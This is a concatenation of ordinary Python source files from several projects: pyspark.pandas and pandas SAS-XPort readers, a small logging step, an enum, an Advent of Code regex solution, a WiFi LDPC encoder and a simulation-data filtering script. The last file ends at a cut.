DataFrame.join : Join columns of another DataFrame.
DataFrame.update : Modify in place using non-NA values from another DataFrame.
DataFrame.hint : Specifies some hint on the current DataFrame.
Examples
--------
>>> df1 = pp.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [1, 2, 3, 5]},
... columns=['lkey', 'value']).set_index('lkey')
>>> df2 = pp.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [5, 6, 7, 8]},
... columns=['rkey', 'value']).set_index('rkey')
>>> merged = df1.merge(pp.broadcast(df2), left_index=True, right_index=True)
>>> merged.spark.explain() # doctest: +ELLIPSIS
== Physical Plan ==
...
...BroadcastHashJoin...
...
"""
if not isinstance(obj, DataFrame):
raise ValueError("Invalid type : expected DataFrame got {}".format(type(obj).__name__))
return DataFrame(
obj._internal.with_new_sdf(F.broadcast(obj._internal.resolved_copy.spark_frame))
)
def read_orc(
path,
columns: Optional[List[str]] = None,
index_col: Optional[Union[str, List[str]]] = None,
**options
) -> "DataFrame":
"""
Load an ORC object from the file path, returning a DataFrame.
Parameters
----------
path : str
The path string storing the ORC file to be read.
columns : list, default None
If not None, only these columns will be read from the file.
index_col : str or list of str, optional, default: None
Index column of table in Spark.
options : dict
All other options passed directly into Spark's data source.
Returns
-------
DataFrame
Examples
--------
>>> pp.range(1).to_orc('%s/read_spark_io/data.orc' % path)
>>> pp.read_orc('%s/read_spark_io/data.orc' % path, columns=['id'])
id
0 0
You can preserve the index in the roundtrip as below.
>>> pp.range(1).to_orc('%s/read_spark_io/data.orc' % path, index_col="index")
>>> pp.read_orc('%s/read_spark_io/data.orc' % path, columns=['id'], index_col="index")
... # doctest: +NORMALIZE_WHITESPACE
id
index
0 0
"""
if "options" in options and isinstance(options.get("options"), dict) and len(options) == 1:
options = options.get("options") # type: ignore
kdf = read_spark_io(path, format="orc", index_col=index_col, **options)
if columns is not None:
kdf_columns = kdf.columns
new_columns = list()
for column in list(columns):
if column in kdf_columns:
new_columns.append(column)
else:
raise ValueError("Unknown column name '{}'".format(column))
kdf = kdf[new_columns]
return kdf
def _get_index_map(
sdf: spark.DataFrame, index_col: Optional[Union[str, List[str]]] = None
) -> Tuple[Optional[List[spark.Column]], Optional[List[Tuple]]]:
if index_col is not None:
if isinstance(index_col, str):
index_col = [index_col]
sdf_columns = set(sdf.columns)
for col in index_col:
if col not in sdf_columns:
raise KeyError(col)
index_spark_columns = [
scol_for(sdf, col) for col in index_col
] # type: Optional[List[spark.Column]]
index_names = [(col,) for col in index_col] # type: Optional[List[Tuple]]
else:
index_spark_columns = None
index_names = None
return index_spark_columns, index_names
_get_dummies_default_accept_types = (DecimalType, StringType, DateType)
_get_dummies_acceptable_types = _get_dummies_default_accept_types + (
ByteType,
ShortType,
IntegerType,
LongType,
FloatType,
DoubleType,
BooleanType,
TimestampType,
)
def _test():
import os
import doctest
import shutil
import sys
import tempfile
import uuid
from pyspark.sql import SparkSession
import pyspark.pandas.namespace
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.pandas.namespace.__dict__.copy()
globs["pp"] = pyspark.pandas
spark = (
SparkSession.builder.master("local[4]")
.appName("pyspark.pandas.namespace tests")
.getOrCreate()
)
db_name = "db%s" % str(uuid.uuid4()).replace("-", "")
spark.sql("CREATE DATABASE %s" % db_name)
globs["db"] = db_name
path = tempfile.mkdtemp()
globs["path"] = path
(failure_count, test_count) = doctest.testmod(
pyspark.pandas.namespace,
globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE,
)
shutil.rmtree(path, ignore_errors=True)
spark.sql("DROP DATABASE IF EXISTS %s CASCADE" % db_name)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
py | 1a4ba544f5d591659cd9f2944eb4278a0e53d3b6 | """
Read a SAS XPort format file into a Pandas DataFrame.
Based on code from Jack Cushman (github.com/jcushman/xport).
The file format is defined here:
https://support.sas.com/techsup/technote/ts140.pdf
"""
from collections import abc
from datetime import datetime
import struct
import warnings
import numpy as np
from pandas.util._decorators import Appender
import pandas as pd
from pandas.io.common import get_filepath_or_buffer
from pandas.io.sas.sasreader import ReaderBase
_correct_line1 = (
"HEADER RECORD*******LIBRARY HEADER RECORD!!!!!!!"
"000000000000000000000000000000 "
)
_correct_header1 = (
"HEADER RECORD*******MEMBER HEADER RECORD!!!!!!!000000000000000001600000000"
)
_correct_header2 = (
"HEADER RECORD*******DSCRPTR HEADER RECORD!!!!!!!"
"000000000000000000000000000000 "
)
_correct_obs_header = (
"HEADER RECORD*******OBS HEADER RECORD!!!!!!!"
"000000000000000000000000000000 "
)
_fieldkeys = [
"ntype",
"nhfun",
"field_length",
"nvar0",
"name",
"label",
"nform",
"nfl",
"num_decimals",
"nfj",
"nfill",
"niform",
"nifl",
"nifd",
"npos",
"_",
]
_base_params_doc = """\
Parameters
----------
filepath_or_buffer : string or file-like object
Path to SAS file or object implementing binary read method."""
_params2_doc = """\
index : identifier of index column
Identifier of column that should be used as index of the DataFrame.
encoding : string
Encoding for text data.
chunksize : int
Read file `chunksize` lines at a time, returns iterator."""
_format_params_doc = """\
format : string
File format, only `xport` is currently supported."""
_iterator_doc = """\
iterator : boolean, default False
Return XportReader object for reading file incrementally."""
_read_sas_doc = f"""Read a SAS file into a DataFrame.
{_base_params_doc}
{_format_params_doc}
{_params2_doc}
{_iterator_doc}
Returns
-------
DataFrame or XportReader
Examples
--------
Read a SAS Xport file:
>>> df = pd.read_sas('filename.XPT')
Read an Xport file in 10,000 line chunks:
>>> itr = pd.read_sas('filename.XPT', chunksize=10000)
>>> for chunk in itr:
>>> do_something(chunk)
"""
_xport_reader_doc = f"""\
Class for reading SAS Xport files.
{_base_params_doc}
{_params2_doc}
Attributes
----------
member_info : list
Contains information about the file
fields : list
Contains information about the variables in the file
"""
_read_method_doc = """\
Read observations from a SAS Xport file, returning them as a data frame.
Parameters
----------
nrows : int
Number of rows to read from data file; if None, read whole
file.
Returns
-------
A DataFrame.
"""
def _parse_date(datestr: str) -> datetime:
""" Given a date in xport format, return Python date. """
try:
# e.g. "16FEB11:10:07:55"
return datetime.strptime(datestr, "%d%b%y:%H:%M:%S")
except ValueError:
return pd.NaT
def _split_line(s: str, parts):
"""
Parameters
----------
s: str
Fixed-length string to split
parts: list of (name, length) pairs
Used to break up string, name '_' will be filtered from output.
Returns
-------
Dict of name:contents of string at given location.
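    For example (illustrative), _split_line("SAS V9.4 pad",
    [("prefix", 4), ("version", 5), ("_", 3)]) returns
    {"prefix": "SAS", "version": "V9.4"}; the "_" slice is dropped.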
"""
out = {}
start = 0
for name, length in parts:
out[name] = s[start : start + length].strip()
start += length
del out["_"]
return out
def _handle_truncated_float_vec(vec, nbytes):
# This feature is not well documented, but some SAS XPORT files
# have 2-7 byte "truncated" floats. To read these truncated
# floats, pad them with zeros on the right to make 8 byte floats.
#
# References:
# https://github.com/jcushman/xport/pull/3
# The R "foreign" library
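    # For example (illustrative), a 2-byte field b"\x41\x10" is padded to
    # b"\x41\x10\x00\x00\x00\x00\x00\x00" before being parsed as an 8-byte IBM float.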
if nbytes != 8:
vec1 = np.zeros(len(vec), np.dtype("S8"))
dtype = np.dtype(f"S{nbytes},S{8 - nbytes}")
vec2 = vec1.view(dtype=dtype)
vec2["f0"] = vec
return vec2
return vec
def _parse_float_vec(vec):
"""
Parse a vector of float values representing IBM 8 byte floats into
native 8 byte floats.
"""
dtype = np.dtype(">u4,>u4")
vec1 = vec.view(dtype=dtype)
xport1 = vec1["f0"]
xport2 = vec1["f1"]
# Start by setting first half of ieee number to first half of IBM
# number sans exponent
ieee1 = xport1 & 0x00FFFFFF
# The fraction bit to the left of the binary point in the ieee
# format was set and the number was shifted 0, 1, 2, or 3
# places. This will tell us how to adjust the ibm exponent to be a
# power of 2 ieee exponent and how to shift the fraction bits to
# restore the correct magnitude.
shift = np.zeros(len(vec), dtype=np.uint8)
shift[np.where(xport1 & 0x00200000)] = 1
shift[np.where(xport1 & 0x00400000)] = 2
shift[np.where(xport1 & 0x00800000)] = 3
# shift the ieee number down the correct number of places then
# set the second half of the ieee number to be the second half
# of the ibm number shifted appropriately, ored with the bits
# from the first half that would have been shifted in if we
# could shift a double. All we are worried about are the low
# order 3 bits of the first half since we're only shifting by
# 1, 2, or 3.
ieee1 >>= shift
ieee2 = (xport2 >> shift) | ((xport1 & 0x00000007) << (29 + (3 - shift)))
# clear the 1 bit to the left of the binary point
ieee1 &= 0xFFEFFFFF
# set the exponent of the ieee number to be the actual exponent
# plus the shift count + 1023. Or this into the first half of the
# ieee number. The ibm exponent is excess 64 but is adjusted by 65
# since during conversion to ibm format the exponent is
# incremented by 1 and the fraction bits left 4 positions to the
# right of the radix point. (had to add >> 24 because C treats &
# 0x7f as 0x7f000000 and Python doesn't)
ieee1 |= ((((((xport1 >> 24) & 0x7F) - 65) << 2) + shift + 1023) << 20) | (
xport1 & 0x80000000
)
ieee = np.empty((len(ieee1),), dtype=">u4,>u4")
ieee["f0"] = ieee1
ieee["f1"] = ieee2
ieee = ieee.view(dtype=">f8")
ieee = ieee.astype("f8")
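    # Worked example (illustrative): IBM 1.0 is stored as 0x4110000000000000
    # (exponent byte 0x41, fraction bits 0x100000...); the transformation above maps it
    # to the IEEE-754 pattern 0x3FF0000000000000, i.e. 1.0.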
return ieee
class XportReader(ReaderBase, abc.Iterator):
__doc__ = _xport_reader_doc
def __init__(
self, filepath_or_buffer, index=None, encoding="ISO-8859-1", chunksize=None
):
self._encoding = encoding
self._lines_read = 0
self._index = index
self._chunksize = chunksize
if isinstance(filepath_or_buffer, str):
filepath_or_buffer = get_filepath_or_buffer(
filepath_or_buffer, encoding=encoding
).filepath_or_buffer
if isinstance(filepath_or_buffer, (str, bytes)):
self.filepath_or_buffer = open(filepath_or_buffer, "rb")
else:
# Since xport files include non-text byte sequences, xport files
# should already be opened in binary mode in Python 3.
self.filepath_or_buffer = filepath_or_buffer
self._read_header()
def close(self):
self.filepath_or_buffer.close()
def _get_row(self):
return self.filepath_or_buffer.read(80).decode()
def _read_header(self):
self.filepath_or_buffer.seek(0)
# read file header
line1 = self._get_row()
if line1 != _correct_line1:
self.close()
raise ValueError("Header record is not an XPORT file.")
line2 = self._get_row()
fif = [["prefix", 24], ["version", 8], ["OS", 8], ["_", 24], ["created", 16]]
file_info = _split_line(line2, fif)
if file_info["prefix"] != "SAS SAS SASLIB":
self.close()
raise ValueError("Header record has invalid prefix.")
file_info["created"] = _parse_date(file_info["created"])
self.file_info = file_info
line3 = self._get_row()
file_info["modified"] = _parse_date(line3[:16])
# read member header
header1 = self._get_row()
header2 = self._get_row()
headflag1 = header1.startswith(_correct_header1)
headflag2 = header2 == _correct_header2
if not (headflag1 and headflag2):
self.close()
raise ValueError("Member header not found")
# usually 140, could be 135
fieldnamelength = int(header1[-5:-2])
# member info
mem = [
["prefix", 8],
["set_name", 8],
["sasdata", 8],
["version", 8],
["OS", 8],
["_", 24],
["created", 16],
]
member_info = _split_line(self._get_row(), mem)
mem = [["modified", 16], ["_", 16], ["label", 40], ["type", 8]]
member_info.update(_split_line(self._get_row(), mem))
member_info["modified"] = _parse_date(member_info["modified"])
member_info["created"] = _parse_date(member_info["created"])
self.member_info = member_info
# read field names
types = {1: "numeric", 2: "char"}
fieldcount = int(self._get_row()[54:58])
datalength = fieldnamelength * fieldcount
# round up to nearest 80
if datalength % 80:
datalength += 80 - datalength % 80
fielddata = self.filepath_or_buffer.read(datalength)
fields = []
obs_length = 0
while len(fielddata) >= fieldnamelength:
# pull data for one field
field, fielddata = (
fielddata[:fieldnamelength],
fielddata[fieldnamelength:],
)
# rest at end gets ignored, so if field is short, pad out
# to match struct pattern below
field = field.ljust(140)
fieldstruct = struct.unpack(">hhhh8s40s8shhh2s8shhl52s", field)
field = dict(zip(_fieldkeys, fieldstruct))
del field["_"]
field["ntype"] = types[field["ntype"]]
fl = field["field_length"]
if field["ntype"] == "numeric" and ((fl < 2) or (fl > 8)):
self.close()
msg = f"Floating field width {fl} is not between 2 and 8."
raise TypeError(msg)
for k, v in field.items():
try:
field[k] = v.strip()
except AttributeError:
pass
obs_length += field["field_length"]
fields += [field]
header = self._get_row()
if not header == _correct_obs_header:
self.close()
raise ValueError("Observation header not found.")
self.fields = fields
self.record_length = obs_length
self.record_start = self.filepath_or_buffer.tell()
self.nobs = self._record_count()
self.columns = [x["name"].decode() for x in self.fields]
# Setup the dtype.
dtypel = [
("s" + str(i), "S" + str(field["field_length"]))
for i, field in enumerate(self.fields)
]
dtype = np.dtype(dtypel)
self._dtype = dtype
def __next__(self):
return self.read(nrows=self._chunksize or 1)
def _record_count(self) -> int:
"""
Get number of records in file.
This is maybe suboptimal because we have to seek to the end of
the file.
Side effect: returns file position to record_start.
"""
self.filepath_or_buffer.seek(0, 2)
total_records_length = self.filepath_or_buffer.tell() - self.record_start
if total_records_length % 80 != 0:
warnings.warn("xport file may be corrupted")
if self.record_length > 80:
self.filepath_or_buffer.seek(self.record_start)
return total_records_length // self.record_length
self.filepath_or_buffer.seek(-80, 2)
last_card = self.filepath_or_buffer.read(80)
last_card = np.frombuffer(last_card, dtype=np.uint64)
        # 2314885530818453536 is b'        ' (eight ASCII blanks) read as uint64,
        # i.e. a trailing blank padding block
ix = np.flatnonzero(last_card == 2314885530818453536)
if len(ix) == 0:
tail_pad = 0
else:
tail_pad = 8 * len(ix)
self.filepath_or_buffer.seek(self.record_start)
return (total_records_length - tail_pad) // self.record_length
def get_chunk(self, size=None):
"""
Reads lines from Xport file and returns as dataframe
Parameters
----------
size : int, defaults to None
Number of lines to read. If None, reads whole file.
Returns
-------
DataFrame
"""
if size is None:
size = self._chunksize
return self.read(nrows=size)
def _missing_double(self, vec):
v = vec.view(dtype="u1,u1,u2,u4")
miss = (v["f1"] == 0) & (v["f2"] == 0) & (v["f3"] == 0)
miss1 = (
((v["f0"] >= 0x41) & (v["f0"] <= 0x5A))
| (v["f0"] == 0x5F)
| (v["f0"] == 0x2E)
)
miss &= miss1
return miss
@Appender(_read_method_doc)
def read(self, nrows=None):
if nrows is None:
nrows = self.nobs
read_lines = min(nrows, self.nobs - self._lines_read)
read_len = read_lines * self.record_length
if read_len <= 0:
self.close()
raise StopIteration
raw = self.filepath_or_buffer.read(read_len)
data = np.frombuffer(raw, dtype=self._dtype, count=read_lines)
df = pd.DataFrame(index=range(read_lines))
for j, x in enumerate(self.columns):
vec = data["s" + str(j)]
ntype = self.fields[j]["ntype"]
if ntype == "numeric":
vec = _handle_truncated_float_vec(vec, self.fields[j]["field_length"])
miss = self._missing_double(vec)
v = _parse_float_vec(vec)
v[miss] = np.nan
elif self.fields[j]["ntype"] == "char":
v = [y.rstrip() for y in vec]
if self._encoding is not None:
v = [y.decode(self._encoding) for y in v]
df[x] = v
if self._index is None:
df.index = range(self._lines_read, self._lines_read + read_lines)
else:
df = df.set_index(self._index)
self._lines_read += read_lines
return df
|
py | 1a4ba5694cc017f58f30cbd809e4bda8d618daf2 | from schmetterling.core.log import log_config, log_params_return
from schmetterling.log.state import LogState
@log_params_return('info')
def execute(state, log_dir, name, level):
log_handlers = log_config(log_dir, name, level)
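    # log_config returns the configured handlers keyed by name; the file handler's
    # log file path is recorded in the LogState returned below.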
return LogState(__name__, log_handlers['file_handler'].baseFilename)
|
py | 1a4ba5a42db8743a154d3cbe490858a480309e93 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from enum import Enum
MODULE_EXCEPT_LIST = ['Sequential']
class OpTypeName(str, Enum):
"""
op type to its type name str
"""
Attr = 'Attr'
Constant = 'Constant'
LayerChoice = 'LayerChoice'
InputChoice = 'InputChoice'
ValueChoice = 'ValueChoice'
Placeholder = 'Placeholder'
MergedSlice = 'MergedSlice'
Repeat = 'Repeat'
Cell = 'Cell'
|
py | 1a4ba6a4146cd4e4985af8dc7c3b3de714edfa43 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Day 5 of AdventOfCode.com: regex matching"""
import re
import os
class RegexMatchCounter(object):
"""This class counts strings which satisfy all specified regular expressions
"""
def __init__(self, regex_strings):
"""The constructor needs a list of valid regular expressions.
:param regex_strings: list of valid regular expressions to be matched"""
self.__regexes = [re.compile(regex) for regex in regex_strings]
self.__count = 0
def check(self, target):
        This method checks its string argument against the regexes and, if all of them match, increments the counter
:param target: string to be matched
"""
if all(reg.search(target) is not None for reg in self.__regexes):
self.__count += 1
def count(self):
""":return: the current value of how many strings have matched regexes
"""
return self.__count
matchers = [
RegexMatchCounter([r'([aeiou].*){3}', r'(.)\1', r'^((?!(ab)|(cd)|(pq)|(xy)).)*$']),
RegexMatchCounter([r'(..).*\1', r'(.).\1'])
]
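# The first counter above implements part 1 ("nice" strings): at least three vowels,
# at least one doubled letter, and none of the substrings ab, cd, pq, xy.
# The second counter implements part 2: a pair of two letters that appears at least
# twice without overlapping, and a letter that repeats with exactly one character
# in between.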
with open(os.path.dirname(os.path.realpath('__file__')) + "/input/day5.txt", "r") as datafile:
for line in datafile:
for matcher in matchers:
matcher.check(line)
for matcher in matchers:
print(matcher.count())
|
py | 1a4ba7219b34b9f6f0684cdb37eb5d996de8be6f | from ldpc.encoder.base_encoder import Encoder
import numpy.typing as npt
import numpy as np
from bitstring import Bits
from ldpc.utils.custom_exceptions import IncorrectLength
from ldpc.utils.qc_format import QCFile
import os
from numpy.typing import NDArray
from ldpc.wifi_spec_codes import WiFiSpecCode
from typing import Any
class EncoderWiFi(Encoder):
"""Encode messages according to the codes in the IEEE802.11n standard"""
_spec_base_path: str = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'code_specs', 'ieee802.11')
def __init__(self, spec: WiFiSpecCode) -> None:
"""
:param spec: specify which code from the spec we use
"""
self.spec = spec
qc_file = QCFile.from_file(os.path.join(self._spec_base_path, spec.name + ".qc"))
self.h = qc_file.to_array()
self.m, n = self.h.shape
k = n - self.m
self.z = qc_file.z
self.block_structure = qc_file.block_structure
super().__init__(k, n)
def encode(self, information_bits: Bits) -> Bits:
"""Based on: Efficient encoding of IEEE 802.11n LDPC codes,
https://www.researchgate.net/publication/3389450_Efficient_encoding_of_IEEE_80211n_LDPC_codes
"""
if len(information_bits) != self.k:
raise IncorrectLength
shifted_messages = self._shifted_messages(information_bits)
parities: npt.NDArray[np.int_] = np.zeros((self.m//self.z, self.z), dtype=np.int_)
# special parts see article
parities[0, :] = np.sum(shifted_messages, axis=0) % 2 # find first batch of z parity bits
parities[1, :] = (shifted_messages[0, :] + np.roll(parities[0, :], -1)) % 2 # find second set of z parity bits
parities[-1, :] = (shifted_messages[-1, :] + np.roll(parities[0, :], -1)) % 2 # find last set of z parity bits
for idx in range(1, (self.m//self.z)-2): # -1 needed to avoid exceeding memory limits due to idx+1 below.
# -2 needed as bottom row is a special case.
if self.block_structure[idx][self.k // self.z] >= 0:
# special treatment of x-th row, see article
parities[idx+1, :] = (parities[idx, :] + shifted_messages[idx, :] + parities[0, :]) % 2
else:
parities[idx+1, :] = (parities[idx, :] + shifted_messages[idx, :]) % 2
return information_bits + Bits(np.ravel(parities))
def _shifted_messages(self, information_bits: Bits) -> NDArray[np.int_]:
# break message bits into groups (rows) of Z bits. Each row is a subset of z bits, overall k message bits
bit_blocks: npt.NDArray[np.int_] = np.array(information_bits, dtype=np.int_).reshape((self.k // self.z, self.z))
# find shifted messages (termed lambda_i in article)
shifted_messages: npt.NDArray[np.int_] = np.zeros((self.m // self.z, self.z),
dtype=np.int_) # each row is a sum of circular shifts of
# message bits (some lambda_i in article). One row per block of h.
for i in range(self.m // self.z):
for j in range(self.k // self.z):
if self.block_structure[i][j] >= 0: # zero blocks don't contribute to parity bits
# multiply by translation reduces to shift.
vec: npt.NDArray[Any] = np.roll(bit_blocks[j, :], -self.block_structure[i][j])
shifted_messages[i, :] = np.logical_xor(shifted_messages[i, :], vec) # xor as sum mod 2
return shifted_messages
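# Hypothetical usage sketch (the spec member name below is illustrative and may differ
# from the actual WiFiSpecCode enum members):
#     enc = EncoderWiFi(WiFiSpecCode.N648_R12)
#     codeword = enc.encode(Bits(bin='0' * enc.k))  # k message bits followed by m parity bits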
|
py | 1a4ba7667873f818445881070efecc4204aa4a3f | # Basic python
import numpy as np
import scipy as scp
from scipy.stats import gamma
from scipy.stats import mode
from scipy.stats import itemfreq
from scipy.stats import mode
import pandas as pd
import random
# Parallelization
import multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Pool
import psutil
import argparse
# System utilities
from datetime import datetime
import time
import os
import pickle
import uuid
import glob
import gc
# My own code
import kde_class
#import ddm_data_simulation as ddm_simulator
import boundary_functions as bf
from cdwiener import batch_fptd
# Plotting
import matplotlib.pyplot as plt
# /users/afengler/data/kde/full_ddm/training_data_binned_0_nbins_0_n_20000/full_ddm_nchoices_2_train_data_binned_0_nbins_0_n_20000_213.pickle
# /users/afengler/data/kde/full_ddm/training_data_binned_0_nbins_0_n_20000/simulator_statistics_213.pickle
def filter_simulations_fast(base_simulation_folder = '',
file_name_prefix = '',
file_id = 0,
method_params = [],
param_ranges = 'none', # either 'none' or dict that specifies allowed ranges for parameters
filters = {'mode': 20, # != (checking if mode is max_rt)
'choice_cnt': 0, # > (checking that each choice receive at least 10 samples in simulator)
'mean_rt': 15, # < (checking that mean_rt is smaller than specified value
'std': 0, # > (checking that std is positive for each choice)
'mode_cnt_rel': 0.5 # < (checking that mode does not receive more than a proportion of samples for each choice)
}
):
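    # Filter logic (applied below): parameter-range checks first when `param_ranges` is
    # a dict, then for every choice the dataset must have an RT mode different from
    # filters['mode'], more than filters['choice_cnt'] samples, a mean RT below
    # filters['mean_rt'], an RT standard deviation above filters['std'], and a relative
    # mode count below filters['mode_cnt_rel'].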
file_ = pickle.load(open( base_simulation_folder + file_name_prefix + '_' + str(file_id) + '.pickle', 'rb' ))
init_cols = method_params['param_names'] + method_params['boundary_param_names']
n_datasets = file_[1].shape[0]
# Initialize data frame
sim_stat_data = pd.DataFrame(file_[0],
columns = init_cols)
# MAX RT BY SIMULATION: TEST SHOULD BE CONSISTENT
n_simulations = file_[1].shape[1] #['n_samples']
# TODO: BASE SIMULATIONS FILES NEED TO HOLD THE N-CHOICES PROPERTY DIRECTLY
# TODO RESOLVED
n_choices = len(file_[2]['possible_choices'])
#n_choices = len(np.unique(file_[1][0, :, 1])) # ['n_choices']
# TODO: BASE SIMULATIONS NEED TO HOLD THE UNIQUE CHOICES PROPERTY DIRECTLY
# RIGHT NOW THIS CODE USES THE DATA ITSELF TO RECOVER THE POSSIBLE CHOICES BUT THIS ALLOWS FOR READING IN N CHOICES < REAL N CHOICES
# TODO RESOLVED
choices = file_[2]['possible_choices']
#choices = np.unique(file_[1][0, :, 1])
#n_choices = len(file_[0][2]['possible_choices'])
#choices = file_[0][2]['possible_choices']
max_rts = np.zeros((n_datasets, 1))
max_t = file_[2]['max_t']
sim_stat_data['max_t'] = max_t
#max_ts[:] = max_t
max_ts = np.zeros((n_datasets, 1))
stds = np.zeros((n_datasets, n_choices))
mean_rts = np.zeros((n_datasets, n_choices))
choice_cnts = np.zeros((n_datasets, n_choices))
modes = np.zeros((n_datasets, n_choices))
mode_cnts = np.zeros((n_datasets, n_choices))
#sim_stat_data = [None] * n_datasets
cnt = 0
for i in range(n_datasets):
max_rts[i] = (file_[1][i, :, 0].max().round(2))
max_ts[i] = max_t
#max_ts[i] = (file_[1][i][2]['max_t'])
# Standard deviation of reaction times
choice_cnt = 0
for choice_tmp in choices:
tmp_rts = file_[1][i, :, 0][file_[1][i, :, 1] == choice_tmp]
n_c = len(tmp_rts)
choice_cnts[cnt, choice_cnt] = n_c
mode_tmp = mode(tmp_rts)
if n_c > 0:
mean_rts[cnt, choice_cnt] = np.mean(tmp_rts)
stds[cnt, choice_cnt] = np.std(tmp_rts)
modes[cnt, choice_cnt] = float(mode_tmp[0])
mode_cnts[cnt, choice_cnt] = int(mode_tmp[1])
else:
mean_rts[cnt, choice_cnt] = - 1
stds[cnt, choice_cnt] = - 1
modes[cnt, choice_cnt] = - 1
mode_cnts[cnt, choice_cnt] = 0
choice_cnt += 1
# Basic data column
# TODO: Put this back in respecting new input format
#sim_stat_data[cnt] = [file_[i][2][key] for key in list(file_[i][2].keys())]
cnt += 1
if cnt % 1000 == 0:
print(cnt)
#sim_stat_data = pd.DataFrame(sim_stat_data, columns = file_[0][2].keys())
# Compute some more columns
for i in range(0, n_choices, 1):
sim_stat_data['mean_rt_' + str(i)] = mean_rts[:, i]
sim_stat_data['std_' + str(i)] = stds[:, i]
sim_stat_data['choice_cnt_' + str(i)] = choice_cnts[:,i]
sim_stat_data['mode_' + str(i)] = modes[:, i]
sim_stat_data['mode_cnt_' + str(i)] = mode_cnts[:, i]
# Derived Columns
sim_stat_data['choice_prop_' + str(i)] = sim_stat_data['choice_cnt_' + str(i)] / n_simulations
sim_stat_data['mode_cnt_rel_' + str(i)] = sim_stat_data['mode_cnt_' + str(i)] / sim_stat_data['choice_cnt_' + str(i)]
# Clean-up
sim_stat_data = sim_stat_data.round(decimals = 2)
sim_stat_data = sim_stat_data.fillna(value = 0)
# check that max_t is consistently the same value across simulations
#assert len(np.unique(max_ts)) == 1
# Now filtering
# FILTER 1: PARAMETER RANGES
if param_ranges == 'none':
keep = sim_stat_data['max_t'] >= 0 # should return a vector of all true's
else:
cnt = 0
for param in param_ranges.keys():
if cnt == 0:
keep = (sim_stat_data[param] >= param_ranges[param][0]) & (sim_stat_data[param] <= param_ranges[param][1])
else:
keep = (keep) & \
(sim_stat_data[param] >= param_ranges[param][0]) & (sim_stat_data[param] <= param_ranges[param][1])
cnt += 1
# FILTER 2: SANITY CHECKS (Filter-bank)
for i in range(0, n_choices, 1):
keep = (keep) & \
(sim_stat_data['mode_' + str(i)] != filters['mode']) & \
(sim_stat_data['choice_cnt_' + str(i)] > filters['choice_cnt']) & \
(sim_stat_data['mean_rt_' + str(i)] < filters['mean_rt']) & \
(sim_stat_data['std_' + str(i)] > filters['std']) & \
(sim_stat_data['mode_cnt_rel_' + str(i)] < filters['mode_cnt_rel'])
# Add keep_file column to
sim_stat_data['keep_file'] = keep
# Write files:
#pickle.dump(list(sim_stat_data.loc[keep, 'file']), open(base_simulation_folder + '/keep_files.pickle', 'wb'))
pickle.dump(sim_stat_data,
open(base_simulation_folder + '/simulator_statistics' + '_' + str(file_id) + '.pickle', 'wb'))
return sim_stat_data
def make_kde_data(data = [], metadata = [], n_kde = 100, n_unif_up = 100, n_unif_down = 100, idx = 0):
# def make_kde_data(n_kde = 100, n_unif_up = 100, n_unif_down = 100, idx = 0):
# meta_data = file_[2]
# data = file_[1][idx, :, :]
out = np.zeros((n_kde + n_unif_up + n_unif_down, 3))
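    # Layout of `out` (one training point per row): rows [0, n_kde) are KDE samples with
    # their KDE log-likelihoods, rows [n_kde, n_kde + n_unif_up) are uniformly drawn
    # positive RTs evaluated under the KDE, and the last n_unif_down rows are negative
    # RTs assigned the constant log-likelihood -66.77497.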
tmp_kde = kde_class.logkde((data[:, 0], data[:, 1], metadata))
# Get kde part
samples_kde = tmp_kde.kde_sample(n_samples = n_kde)
likelihoods_kde = tmp_kde.kde_eval(data = samples_kde).ravel()
out[:n_kde, 0] = samples_kde[0].ravel()
out[:n_kde, 1] = samples_kde[1].ravel()
out[:n_kde, 2] = likelihoods_kde
# Get positive uniform part:
choice_tmp = np.random.choice(metadata['possible_choices'], size = n_unif_up)
if metadata['max_t'] < 100:
rt_tmp = np.random.uniform(low = 0.0001,
high = metadata['max_t'],
size = n_unif_up)
else:
rt_tmp = np.random.uniform(low = 0.0001,
high = 100,
size = n_unif_up)
likelihoods_unif = tmp_kde.kde_eval(data = (rt_tmp, choice_tmp)).ravel()
out[n_kde:(n_kde + n_unif_up), 0] = rt_tmp
out[n_kde:(n_kde + n_unif_up), 1] = choice_tmp
out[n_kde:(n_kde + n_unif_up), 2] = likelihoods_unif
# Get negative uniform part:
choice_tmp = np.random.choice(metadata['possible_choices'], #['possible_choices'],
size = n_unif_down)
rt_tmp = np.random.uniform(low = - 1.0,
high = 0.0001,
size = n_unif_down)
out[(n_kde + n_unif_up):, 0] = rt_tmp
out[(n_kde + n_unif_up):, 1] = choice_tmp
out[(n_kde + n_unif_up):, 2] = -66.77497
if idx % 10 == 0:
print(idx)
return out.astype(np.float)
def make_fptd_data(data = [], params = [], metadata = [], n_kde = 100, n_unif_up = 100, n_unif_down = 100, idx = 0):
out = np.zeros((n_kde + n_unif_up + n_unif_down, 3))
tmp_kde = kde_class.logkde((data[:, 0], data[:, 1], metadata))
# Get kde part
samples_kde = tmp_kde.kde_sample(n_samples = n_kde)
out[:n_kde, 0] = samples_kde[0].ravel()
out[:n_kde, 1] = samples_kde[1].ravel()
# If we have 4 parameters we know we have the ddm --> use default sdv = 0
if len(params) == 4:
out[:n_kde, 2] = np.log(batch_fptd(out[:n_kde, 0] * out[:n_kde, 1] * ( -1),
params[0],
params[1] * 2,
params[2],
params[3]))
# If we have 5 parameters but analytic we know we need to use the ddm_sdv --> supply sdv value to batch_fptd
if len(params) == 5:
out[:n_kde, 2] = np.log(batch_fptd(out[:n_kde, 0] * out[:n_kde, 1] * ( -1),
params[0],
params[1] * 2,
params[2],
params[3],
params[4]))
# Get positive uniform part:
choice_tmp = np.random.choice(metadata['possible_choices'], size = n_unif_up)
if metadata['max_t'] < 100:
rt_tmp = np.random.uniform(low = 0.0001,
high = metadata['max_t'],
size = n_unif_up)
else:
rt_tmp = np.random.uniform(low = 0.0001,
high = 100,
size = n_unif_up)
likelihoods_unif = tmp_kde.kde_eval(data = (rt_tmp, choice_tmp)).ravel()
out[n_kde:(n_kde + n_unif_up), 0] = rt_tmp
out[n_kde:(n_kde + n_unif_up), 1] = choice_tmp
# If we have 4 parameters we know we have the ddm --> use default sdv = 0
